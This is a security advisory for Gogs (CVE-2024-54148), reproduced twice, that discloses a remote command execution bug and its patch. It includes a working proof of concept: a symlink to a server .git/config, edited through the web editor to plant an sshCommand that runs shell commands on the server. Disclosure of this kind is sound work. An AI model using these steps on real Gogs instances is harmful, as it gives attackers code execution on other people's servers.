Headline
GHSA-r7j8-5h9c-f6fx: Remote Command Execution in file editing in gogs
Impact
The malicious user is able to commit and edit a crafted symlink file to a repository to gain SSH access to the server.
Patches
Editing symlink while changing the file name has been prohibited via the repository web editor (https://github.com/gogs/gogs/pull/7857). Users should upgrade to 0.13.1 or the latest 0.14.0+dev.
Workarounds
No viable workaround available, please only grant access to trusted users to your Gogs instance on affected versions.
References
n/a
Proof of Concept
Create two repositories, upload something to the first repository, edit any file, and save it on the webpage.
In the second repository, create a symbolic link to the file you need to edit:
$ ln -s /data/gogs/data/tmp/local-repo/1/.git/config test $ ls -la total 8 drwxr-xr-x 5 dd staff 160 Oct 27 19:09 . drwxr-xr-x 4 dd staff 128 Oct 27 19:06 .. drwxr-xr-x 12 dd staff 384 Oct 27 19:09 .git -rw-r--r-- 1 dd staff 12 Oct 27 19:06 README.md lrwxr-xr-x 1 dd staff 44 Oct 27 19:09 test -> /data/gogs/data/tmp/local-repo/1/.git/config $ git add . $ git commit -m 'ddd' $ git push -fGo back to the webpage, edit the symbolic file in the second repository, with the following content, change the filename, and save (here you can notice, with filename changed the symbolic file edit limit is bypassed)
[core] repositoryformatversion = 0 filemode = true bare = false logallrefupdates = true ignorecase = true precomposeunicode = true sshCommand = echo pwnned > /tmp/poc [remote "origin"] url = [git@github.com](mailto:git@github.com):torvalds/linux.git fetch = +refs/heads/*:refs/remotes/origin/* [branch "master"] remote = origin merge = refs/heads/masterGo back to the first repo, edit something, and commit again, you can notice a file called
/tmp/poccreated on the server.
For more information
If you have any questions or comments about this advisory, please post on https://github.com/gogs/gogs/issues/7582.
Impact
The malicious user is able to commit and edit a crafted symlink file to a repository to gain SSH access to the server.
Patches
Editing symlink while changing the file name has been prohibited via the repository web editor (gogs/gogs#7857). Users should upgrade to 0.13.1 or the latest 0.14.0+dev.
Workarounds
No viable workaround available, please only grant access to trusted users to your Gogs instance on affected versions.
References
n/a
Proof of Concept
Create two repositories, upload something to the first repository, edit any file, and save it on the webpage.
In the second repository, create a symbolic link to the file you need to edit:
$ ln -s /data/gogs/data/tmp/local-repo/1/.git/config test $ ls -la total 8 drwxr-xr-x 5 dd staff 160 Oct 27 19:09 . drwxr-xr-x 4 dd staff 128 Oct 27 19:06 … drwxr-xr-x 12 dd staff 384 Oct 27 19:09 .git -rw-r–r-- 1 dd staff 12 Oct 27 19:06 README.md lrwxr-xr-x 1 dd staff 44 Oct 27 19:09 test -> /data/gogs/data/tmp/local-repo/1/.git/config $ git add . $ git commit -m ‘ddd’ $ git push -f
Go back to the webpage, edit the symbolic file in the second repository, with the following content, change the filename, and save (here you can notice, with filename changed the symbolic file edit limit is bypassed)
[core] repositoryformatversion = 0 filemode = true bare = false logallrefupdates = true ignorecase = true precomposeunicode = true sshCommand = echo pwnned > /tmp/poc [remote "origin"] url = [git@github.com](mailto:git@github.com):torvalds/linux.git fetch = +refs/heads/*:refs/remotes/origin/* [branch "master"] remote = origin merge = refs/heads/masterGo back to the first repo, edit something, and commit again, you can notice a file called /tmp/poc created on the server.
For more information
If you have any questions or comments about this advisory, please post on gogs/gogs#7582.
References
- GHSA-r7j8-5h9c-f6fx
- https://nvd.nist.gov/vuln/detail/CVE-2024-54148
- gogs/gogs#7582
- gogs/gogs#7857
- gogs/gogs@c94baec